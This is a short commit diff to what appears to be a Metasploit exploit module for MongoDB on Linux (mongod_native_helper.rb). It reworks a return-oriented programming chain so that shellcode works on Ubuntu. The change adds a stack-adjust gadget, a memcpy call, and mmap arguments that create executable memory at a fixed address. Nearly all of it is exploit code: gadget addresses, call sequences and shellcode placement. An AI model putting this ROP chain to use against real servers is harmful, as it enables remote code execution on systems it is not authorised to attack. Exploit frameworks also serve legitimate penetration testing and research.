add memcpy to the ropchain due to the zeroed mmap function under ubuntu

Author: agix

modules/exploits/linux/misc/mongod_native_helper.rb

@@ -34,13 +34,19 @@ def initialize(info={})
 							'Arch' => ARCH_X86,
 							'mmap' => [
 									0x0816f768,	   #mmap_64@plt
-									0x0c0c0c0c,    #NOPSLED+SHELLCODE
+									0x8666d07,    #add esp, 0x14 / pop ebx / pop ebp / ret
 									0x0c0c0000,
-									0x00010000,
+									0x00002000,
 									0x00000007,
 									0x00000031,
 									0xffffffff,
 									0x00000000,
+									0x78696761,
+									0x0816e4c8,	   #memcpy@plt
+									0x0c0c0c0c,
+									0x0c0c0000,
+									0x0c0b0000,
+									0x00002000
 							],
 							'ret' => [0x08055a70], #ret
 							'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]